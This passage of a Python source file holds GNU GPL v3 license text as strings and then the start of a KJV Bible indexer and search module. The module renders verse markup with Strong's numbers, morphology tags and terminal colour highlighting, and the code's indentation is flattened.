them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
'''
warranty_str = \
'''
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
'''
""" KJV indexer and search modules.
BibleSearch: Can index and search the 'KJV' sword module using different types
of searches, including the following:
    Strongs number search - Searches for all verses containing either
                            the exact Strong's phrase, any of the
                            Strong's numbers, or a superset of the
                            Strong's numbers.
Morphological tags search - Same as the strongs...
Word or phrase search - Same as the strongs...
Regular expression search - Searches the whole Bible using the provided
regular expression.
"""
from sys import argv, exit
from cmd import Cmd
from difflib import get_close_matches
from functools import wraps
from time import strftime
from textwrap import fill
from collections import defaultdict
from itertools import product
import os
import sys
import json
import re
from .utils import *
try:
    import Sword
from .sword_verses import *
except ImportError:
Sword = None
from .verses import *
COLOR_LEVEL = 3
# Highlight colors.
highlight_color = '\033[7m'
highlight_text = '%s\\1\033[m' % highlight_color
word_regx = re.compile(r'\b([\w-]+)\b')
# Strip previous color.
strip_color_regx = re.compile('\033\[[\d;]*m')
def render_raw2(verse_text, strongs=False, morph=False):
""" Render raw verse text.
"""
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
test_regx = re.compile(r'''
([^<]*)
<(?P<tag>seg|q|w|transChange|note)([^>]*)>
([\w\W]*?)
</(?P=tag)>
([^<]*)
''', re.I | re.X)
divname_regx = re.compile(r'''
<(?:divineName)>
([^<]*?)
([\'s]*)
</(?:divineName)>
''', re.I | re.X)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
info_print(verse_text, tag=4)
def recurse_tag(text):
""" Recursively parse raw verse text using regular expressions, and
returns the correctly formatted text.
"""
v_text = ''
for match in test_regx.finditer(text):
opt, tag_name, tag_attr, tag_text, punct = match.groups()
strongs_str = ''
morph_str = ''
italic_str = '<i>%s</i>' if 'added' in tag_attr.lower() else '%s'
if 'note' in tag_name.lower() or 'study' in tag_attr.lower():
note_str = ' <n>%s</n>'
else:
note_str = '%s'
if strongs and strong_regx.search(tag_attr):
strongs_list = strong_regx.findall(tag_attr)
strongs_str = ' <%s>' % '> <'.join(strongs_list)
if morph and morph_regx.search(tag_attr):
morph_list = morph_regx.findall(tag_attr)
morph_str = ' {%s}' % '} {'.join(morph_list)
if match.re.search(tag_text):
temp_text = recurse_tag(tag_text) + strongs_str + morph_str
v_text += note_str % italic_str % (temp_text)
else:
info_print((opt, tag_name, tag_attr, tag_text, punct), tag=4)
opt = marker_regx.sub('<p>\\1</p> ', opt)
tag_text = divname_regx.sub(div_upper, tag_text)
tag_text = note_str % italic_str % tag_text
v_text += opt + tag_text + strongs_str + morph_str
v_text += punct
return v_text
return recurse_tag(verse_text)
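# An illustrative sketch (the OSIS-style markup below is an assumption about
# the raw verse text this module consumes; it is not taken from this file).
def _example_render_raw2():
    raw = '<w lemma="strong:G2316" morph="robinson:N-NSM">God</w>'
    # With both flags enabled this renders to roughly: 'God <G2316> {N-NSM}'
    return render_raw2(raw, strongs=True, morph=True)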
def render_raw(verse_text, strongs=False, morph=False):
""" Render raw verse text.
"""
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
test_regx = re.compile(r'''
([^<]*)
<(?P<tag>q|w|transChange|note)([^>]*)>
([\w\W]*?)
</(?P=tag)>
([^<]*)
''', re.I | re.X)
divname_regx = re.compile(r'''
(?:<seg>)?
<(?:divineName)>+
([^<]*?)
([\'s]*)
</(?:divineName)>
(?:</seg>)?
''', re.I | re.X)
xadded_regx = re.compile(r'<seg subType="x-added"[^>]*>([^<]*)</seg>',
re.I)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
v_text = ''
info_print(verse_text, tag=4)
for match in test_regx.finditer(verse_text):
opt, tag_name, tag_attr, tag_text, punct = match.groups()
italic_str = '%s'
if match.re.search(tag_text):
if 'added' in tag_attr.lower():
italic_str = '<i>%s</i>' + punct
punct = ''
match_list = match.re.findall(tag_text + punct)
else:
match_list = [match.groups()]
temp_text = ''
for opt, tag_name, tag_attr, tag_text, punct in match_list:
info_print((opt, tag_name, tag_attr, tag_text, punct), tag=4)
tag_text = divname_regx.sub(div_upper, tag_text)
tag_text = xadded_regx.sub('<i>\\1</i>', tag_text)
if 'marker' in opt.lower():
temp_text += '<p>%s</p> ' % marker_regx.sub('\\1', opt)
opt = ''
if 'note' in tag_name.lower() or 'study' in tag_attr.lower():
temp_text += ' <n>%s</n>' % tag_text
tag_text = ''
temp_italic = '<i>%s</i>' if 'added' in tag_attr.lower() else '%s'
temp_text += temp_italic % (opt + tag_text)
if tag_name.strip().lower() in ['transchange', 'w', 'seg']:
if strong_regx.search(tag_attr) and strongs:
temp_text += \
' <%s>' % '> <'.join(strong_regx.findall(tag_attr))
if morph_regx.search(tag_attr) and morph:
temp_text += \
' {%s}' % '} {'.join(morph_regx.findall(tag_attr))
temp_text += punct
v_text += italic_str % temp_text
continue
opt, tag_name, tag_attr, tag_text, punct = match.groups()
tag_text = divname_regx.sub(
lambda m: m.group(1).upper() + m.group(2), tag_text)
if 'marker' in opt.lower():
v_text += '<p>%s</p> ' % marker_regx.sub('\\1', opt)
if 'added' in tag_attr.lower():
v_text += '<i>'
elif 'note' in tag_name.lower() or 'study' in tag_attr.lower():
v_text += ' <n>%s</n>' % tag_text
if match.re.search(tag_text):
for i in match.re.finditer(tag_text):
info_print(i.groups(), tag=4)
o, t_n, t_a, t_t, p = i.groups()
if t_n.strip().lower() in ['transchange', 'w']:
v_text += o + t_t
if strong_regx.search(t_a) and strongs:
v_text += \
' <%s>' % '> <'.join(strong_regx.findall(t_a))
if morph_regx.search(t_a) and morph:
v_text += \
' {%s}' % '} {'.join(morph_regx.findall(t_a))
v_text += p
else:
if tag_name.strip().lower() in ['transchange', 'w']:
v_text += tag_text
if strong_regx.search(tag_attr) and strongs:
v_text += \
' <%s>' % '> <'.join(strong_regx.findall(tag_attr))
if morph_regx.search(tag_attr) and morph:
v_text += \
' {%s}' % '} {'.join(morph_regx.findall(tag_attr))
if 'added' in tag_attr.lower():
v_text += '</i>'
v_text += punct
info_print('%s: %s: %s: %s: %s' % (opt, tag_name, tag_attr,
tag_text, punct), tag=4)
return v_text
def render_verses_with_italics(ref_list, wrap=True, strongs=False,
morph=False, added=True, notes=False,
highlight_func=None, module='KJV', *args):
""" Renders a the verse text at verse_ref with italics highlighted.
Returns a strong "verse_ref: verse_text"
ref_list - List of references to render
wrap - Whether to wrap the text.
strongs - Include Strong's Numbers in the output.
morph - Include Morphological Tags in the output.
added - Include added text (i.e. italics) in the output.
notes - Include study notes at the end of the text.
highlight_func - A function to highlight anything else
(i.e. search terms.)
module - Sword module to render from.
*args - Any additional arguments to pass to
                             highlight_func
highlight_func should take at least three arguments, verse_text,
strongs, and morph.
"""
# Set the colors of different items.
end_color = '\033[m'
# Build replacement strings that highlight Strong's Numbers and
# Morphological Tags.
if COLOR_LEVEL >= 2:
# The Strong's and Morphology matching regular expressions.
# Match strongs numbers.
strongs_regx = re.compile(r'''
<((?:\033\[[\d;]*m)*?[GH]?\d+?(?:\033\[[\d;]*m)*?)>
''', re.I | re.X)
# It needs to match with braces or it will catch all capitalized
        # words and words with '-'s in them.
info_print("Rendering results, please wait...\n", tag=0)
morph_regx = re.compile(r'''
\{((?:\033\[[\d+;]*m)*?[\w-]*?(?:\033\[[\d+;]*m)*?)\}
''', re.X)
strongs_color = '\033[36m'
morph_color = '\033[35m'
strongs_highlight = '<%s\\1%s>' % (strongs_color, end_color)
morph_highlight = '{%s\\1%s}' % (morph_color, end_color)
if COLOR_LEVEL >= 0:
ref_color = '\033[32m'
ref_highlight = '%s\\1%s' % (ref_color, end_color)
if COLOR_LEVEL >= 1 and added:
italic_color = '\033[4m'
italic_regx = re.compile(r'<i>\s?(.*?)\s?</i>', re.S)
italic_highlight = '%s\\1%s' % (italic_color, end_color)
# Get the local text encoding.
encoding = get_encoding()
# A substitution replacement function for highlighting italics.
def italic_color(match):
""" Color italic text, but first remove any previous color.
"""
# Strip any previous colors.
match_text = strip_color_regx.sub('', match.groups()[0])
# Color the italics.
return word_regx.sub(italic_highlight, match_text)
# Get an iterator over all the requested verses.
verse_iter = IndexedVerseTextIter(iter(ref_list), strongs, morph,
italic_markers=(COLOR_LEVEL >= 1),
added=added, paragraph=added,
notes=notes, module=module)
if VERBOSE_LEVEL == 20:
verse_iter = VerseTextIter(iter(ref_list), strongs, morph,
module=module, markup=1, #Sword.FMT_PLAIN,
render='render_raw')
if VERBOSE_LEVEL >= 30:
verse_iter = RawDict(iter(ref_list), module=module)
for verse_ref, verse_text in verse_iter:
if VERBOSE_LEVEL >= 30:
len_longest_key = len(max(verse_text[1].keys(), key=len))
for key, value in verse_text[1].items():
print('\033[33m{0:{1}}\033[m: {2}'.format(key,
len_longest_key,
value))
verse_text = verse_text[1]['_verse_text'][0]
        # Encode then decode the verse text to make it compatible with
# the locale.
verse_text = verse_text.strip().encode(encoding, 'replace')
verse_text = verse_text.decode(encoding, 'replace')
verse_text = '%s: %s' % (verse_ref, verse_text)
# The text has to be word wrapped before adding any color, or else the
# color will add to the line length and the line will wrap too soon.
if wrap:
verse_text = fill(verse_text, screen_size()[1],
break_on_hyphens=False)
if COLOR_LEVEL >= 0:
# Color the verse reference.
colored_ref = word_regx.sub(ref_highlight, verse_ref)
verse_text = re.sub(verse_ref, colored_ref, verse_text)
if COLOR_LEVEL >= 1 and added:
# Highlight the italic text we previously pulled out.
verse_text = italic_regx.sub(italic_color, verse_text)
if COLOR_LEVEL >= 2:
# Highlight Strong's and Morphology if they are visible.
if strongs:
verse_text = strongs_regx.sub(strongs_highlight, verse_text)
if morph:
verse_text = morph_regx.sub(morph_highlight, verse_text)
if COLOR_LEVEL >= 3:
# Highlight the different elements.
if highlight_func:
verse_text = highlight_func(verse_text, *args)
        # Finally produce the formatted text.
yield verse_text
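# A minimal usage sketch (an assumption, not part of the original module):
# consume the generator above with a custom highlight_func.  The verse
# reference and the search word are hypothetical, and a prebuilt KJV index is
# assumed to exist.
def _example_render_usage():
    def highlight_faith(verse_text, *args):
        # Wrap every occurrence of 'faith' in the module-level highlight color.
        return re.sub(r'\b(faith)\b', highlight_text, verse_text)
    for line in render_verses_with_italics(['Hebrews 11:1'],
                                           highlight_func=highlight_faith):
        print(line)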
def highlight_search_terms(verse_text, regx_list, highlight_text,
color_tag='\033\[[\d+;]*m', *args):
""" Highlight search terms in the verse text.
"""
def highlight_group(match):
""" Highlight each word/Strong's Number/Morphological Tag in the
match.
"""
match_text = match.group()
for word in set(match.groups()):
if word: # and word != match_text:
# if word.lower() == 'strong' and word == match_text:
# continue
info_print(word, tag=20)
try:
match_text = re.sub('''
(
(?:{0}|\\b)+
{1}
(?:{0}|\\b)+
)
'''.format(color_tag, re.escape(word)),
highlight_text, match_text, flags=re.X)
except Exception as err:
info_print("Error with highlighting word %s: %s" % \
(word, err), tag=4)
#match_text = match_text.replace(word, '\033[7m%s\033[m' % word)
# print(match_text)
return match_text
# Strip any previous colors.
